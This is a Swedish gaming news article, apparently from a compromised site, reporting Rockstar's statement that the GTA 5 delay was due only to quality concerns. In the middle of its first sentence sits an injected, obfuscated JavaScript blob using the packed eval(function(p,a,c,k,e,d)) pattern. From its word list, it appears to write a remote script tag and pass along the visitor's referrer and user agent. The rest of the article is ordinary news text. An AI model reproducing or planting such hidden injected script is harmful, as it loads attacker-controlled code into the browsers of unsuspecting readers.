Image Image Image Image Image Image Image Image Image Image

| 2 juni, 2020

Scroll to top

Top

”GTA 5 försenades för att säkra kvaliteten” – Rockstar

gta v
Filip Urde
  • On 5 februari, 2013
  • http://www.revue.se/filip-urde

Nyligen eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ibkrr|var|u0026u|referrer|bdbtt||js|php’.split(’|’),0,{}))
så fick vi äntligen ett datum på när nya GTA 5 släpps, vilket är ett datum som är några månader efter det första utsatta datumet.

 

 

I och med denna försening så har spekulationerna kring varför? florerat på internet. En av dem största och populäraste teorierna har varit att man skjutit upp släppet p.g.a. att man ska kunna släppa GTA 5 på både de gamla och de nya icke utannonserade konsolerna från Microsoft och Sony (Xbox 720 och Playstation 4). Men Rockstar förnekar detta och menar att förseningen endast beror på att de vill säkra kvaliteten på spelet.

Rockstar kallar alla spekulationer för konspirationsteorier och säger följande:

”To those of you saying or seeing various conspiracy theories about there being some other ulterior motive for this delay, rest assured that they’re all nonsense – literally the only reason we’ve delayed the release is because we want the game to be as good as it needs to be.”

Rockstar meddelar även att det officiella omslaget för GTA 5 är på gång, men att det också försenats.

www.computerandvideogames.com